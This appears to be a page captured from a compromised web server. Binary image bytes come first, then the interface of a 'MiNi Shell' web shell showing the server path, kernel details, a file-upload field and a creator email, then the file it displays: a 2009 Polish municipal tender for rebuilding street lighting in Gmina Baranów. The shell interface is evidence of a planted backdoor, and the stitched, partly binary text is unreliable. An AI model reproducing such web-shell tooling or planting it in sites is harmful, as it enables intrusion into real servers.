JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090417/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090417/110018-N-2009.html

<p class="kh_header"><b>Baranów: Wykonanie przebudowy systemu oświetlenia ulicznego na terenie Gminy Baranów</b><br>
<b>Numer ogłoszenia: 110018 - 2009; data zamieszczenia: 17.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Baranów , ul. Armii Krajowej 87, 96-314 Baranów, woj. mazowieckie, tel. 0-46 8560320, faks 0-46 8560324.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie przebudowy systemu oświetlenia ulicznego na terenie Gminy Baranów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: 

Wykonanie przebudowy systemu oświetlenia ulicznego na terenie Gminy Baranów
1.1	
Realizacja zamówienia ma na celu:
-	zmniejszenie energochłonności istniejącego systemu, (poprzez zmniejszenie mocy
            pobieranej 
-          zmniejszenie emisji czynników szkodliwych powstających w wyniku wytwarzania 
           energii
-	zmniejszenie kosztów bieżącej eksploatacji, a w tym napraw, remontów, konserwacji,
-	podniesienie niezawodności funkcjonowania oświetlenia ulicznego
-	zwiększenie bezpieczeństwa mieszkańców poprzez polepszenie stanu oświetlenia dróg
-	poprawę estetyki Gminy poprzez ujednolicenie systemu, świecenie wszystkich opraw, 
            równomierność oświetlenia.	
 W zakresie realizacji zadania wykonawca powinien przeprowadzić:
W ramach przebudowy:
-  dokonanie uzgodnień dotyczących robót energetycznych z właściwym ZE  przed realizacją
   przebudowy (Wszystkie prace powinny zostać wykonane zgodnie z warunkami technicznymi wydanymi
   przez w/w ZE. Warunki techniczne stanowią załącznik do specyfikacji).
-  zdemontowanie starych opraw oraz ich rozliczenie z Urzędem Gminy oraz z właściwym Zakładem
   Energetycznym (utylizacja opraw i źródeł światła na koszt wykonawcy).
-  zakupienie i dostawę nowych opraw, źródeł światła oraz niezbędnego osprzętu do realizacji zadania,
-  montaż nowych opraw i źródeł światła oraz niezbędnego osprzętu zgodnie z projektem technicznym
   przebudowy oświetlenia 
UWAGA! Na wykonane roboty i użyty sprzęt Wykonawca udzieli 3-letniej gwarancji.

Zamawiający dopuszcza składanie ofert równoważnych:
Przebudowa systemu oświetlenia powinna być wykonana zgodnie z posiadaną przez Urząd Gminy dokumentacją projektową. Zamawiający dopuszcza zastosowanie zamiennych (równoważnych) materiałów.
Sprzęt oraz urządzenia przedstawione przez oferenta w ofercie równoważnej muszą gwarantować co najmniej takie same warunki i parametry, jakie zawierają sprzęt i urządzenia przedstawione w dokumentacji projektowej będącej w posiadaniu Zamawiającego .
Oferent pragnący złożyć ofertę stosując oprawy zamienne w stosunku do projektu Zamawiającego, zobowiązany jest do przygotowania i załączenia do oferty dokumentacji technicznej.
W zakresie tej dokumentacji technicznej należy wykonać:
a.	dobór rodzaju, typu opraw oraz mocy źródeł światła dla określonych kategorii oświetlenia ulic i dróg 
b.	Zamawiający ustalił program konserwacji i dla takiego programu wyliczono współczynnik zapasu na poziomie 1,3. W przypadku innego współczynnika należy przedstawić szczegółowy program konserwacji systemu oświetlenia
c.	dobór rodzaju, typu opraw oraz mocy źródeł światła należy poprzeć niezbędnymi obliczeniami parametrów oświetleniowych (luminancji oświetlenia, równomierności luminancji, równomierności natężenia oświetlenia i natężenia oświetlenia oraz wskaźnik Ti) - wyliczenia muszą być wykonane dla identycznych danych wejściowych jak w projekcie Zamawiającego (parametry dróg i ulic, obserwatorzy, siatka obliczeń). 
UWAGA:
Wyniki obliczeń należy przedstawić w sposób zbliżony do przedstawienia w projekcie Zamawiającego: 
- należy precyzyjnie podać typ oprawy, moc źródła światła, 
- należy precyzyjnie podać pozycje nastaw odbłyśnika i oprawki (jeśli oprawa taką regulację posiada) (oznaczenia te muszą odpowiadać oznaczeniom w programie do obliczania i w bazie danych opraw) 
- wydruki muszą zawierać wszystkie dane, obliczenia, tabele, takie, które występują w projekcie Zamawiającego
W celu weryfikacji oferty równoważnej Zamawiający powoła biegłych ekspertów z zakresu projektowania oświetlenia.
 d.   projekt rozmieszczenia opraw oświetleniowych
UWAGA! Wymagania oświetleniowe obowiązujące w dokumentacji posiadanej przez Zamawiającego są zgodne z wymaganiami Polskiej Normy PN-EN 13201
Rozwiązania przyjęte w projekcie równorzędnym muszą gwarantować wartości parametrów oświetleniowych na poziomie nie mniejszym niż wyliczone w projekcie posiadanym przez Zamawiającego.
Sprzęt równoważny nie może odbiegać od następujących wymagań:
Dla opraw oświetleniowych ulicznych:
*	stopień ochrony komory zespołu optycznego nie niższy niż IP 65 i komory osprzętu elektrycznego 
            nie niższy niż IP 65. 
* 	oprawy wykonane w II klasie ochronności przeciwporażeniowej
*          klosz oprawy wykonany z materiału - odpornego na promieniowanie UV
*	oprawy muszą posiadać stateczniki z zabezpieczeniem termicznym. 
*	oprawy muszą posiadać atesty (znak B) dopuszczające je  do obrotu w Polsce.
*	oprawy muszą posiadać regulację rozsyłu strumienia świetlnego

Dla źródeł światła:
Zastosowanie źródeł światła innych producentów jest możliwe bez dokonywania przeliczeń projektowych pod warunkiem, że będą one ścisłymi odpowiednikami (lampy o podwyższonej skuteczności świetlnej) przewidzianych w projekcie (w zakresie strumienia świetlnego , jego spadku w czasie eksploatacji, trwałości itp.)..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.31.61.10-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> o udzielenie zamówienia mogą ubiegać się wykonawcy, którzy : 1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; 2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia; 3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia; 4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 Ustawy Pzp
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na podstawie przedłożonych dokumentów, oświadczeń i zaświadczeń wymaganych postanowieniami specyfikacji istotnych warunków zamówienia, wg formuły spełnia - nie spełnia.
Nie spełnianie chociażby jednego warunku skutkować będzie wykluczeniem Wykonawcy z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Lp:	Nazwa dokumentu potwierdzającego:	Wymagany dokument:
1	Aktualny odpis z właściwego rejestru	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
2	Informacja z Krajowego Rejestru Karnego w zakresie art. 24 ust. 1 pkt 4-8 Prawa Zamówień Publicznych	aktualna informacja z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 4 - 8 ustawy z dnia 29 stycznia 2004 roku Prawo Zamówień Publicznych, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
3	Informacja z Krajowego Rejestru Karnego w zakresie art. 24 ust. 1 pkt 9 Prawa Zamówień Publicznych	aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy z dnia 29 stycznia 2004 roku Prawo Zamówień Publicznych, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
4	Zaświadczenie z właściwego organu podatkowego oraz ZUS	aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert
5	Uprawnienia do kierowania pracami elektrycznymi	Uprawnienia do kierowania pracami elektrycznymi wystawione na osobę kierownika budowy.
6	Wykaz niezbędnych narzędzi i urządzeń (załącznik nr 7)	wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, jakie posiada wykonawca
7	Wykaz osób i podmiotów wykonujących zamówienie (załącznik nr 8)	wykaz osób i podmiotów, które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności
8	Zaświadczenie o przynależności do Okręgowej Izby Inżynierów Budownictwa	Zaświadczenie o przynależności do Okręgowej Izby Inżynierów Budownictwa osób pełniących samodzielne funkcje techniczne przy realizacji zadania.
9	Potwierdzenie posiadanych uprawnień	dokumenty stwierdzające, że osoby, które będą wykonywać zamówienie, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień 
10	Informacje z banku	informacja banku, w którym wykonawca posiada podstawowy rachunek bankowy, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
11	Ubezpieczenie od odpowiedzialności cywilnej	polisa lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie przebudowy oświetlenia
12	Kosztorys ofertowy (załącznik 
nr 2)	Kosztorys ofertowy wypełniony dokładnie według załączonego wzoru
13	Podpisany wzór umowy (załącznik nr 6)	Podpisany wzór umowy
14	Wykaz podwykonawców (załącznik nr 9)	Wykaz  podwykonawców przewidzianych do realizacji zamówienia, wraz z zakresem prac przewidzianych do realizacji dla poszczególnych podwykonawców (jeżeli są przewidywani)
15	Wykaz wykonanych robót budowlanych (załącznik nr 10)	Wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed wszczęciem niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania wraz z dokumentami potwierdzającymi, że roboty te zostały wykonane należycie wymagany jest w celu potwierdzenia, że wykonawca posiada niezbędną wiedzę oraz doświadczenie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.gmina-baranow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Baranów ul. Armii Krajowej 87.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.05.2009 godzina 10:00, miejsce: Gmina Baranów ul. Armii Krajowej 87, 96-314 Baranów pokój nr 10.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com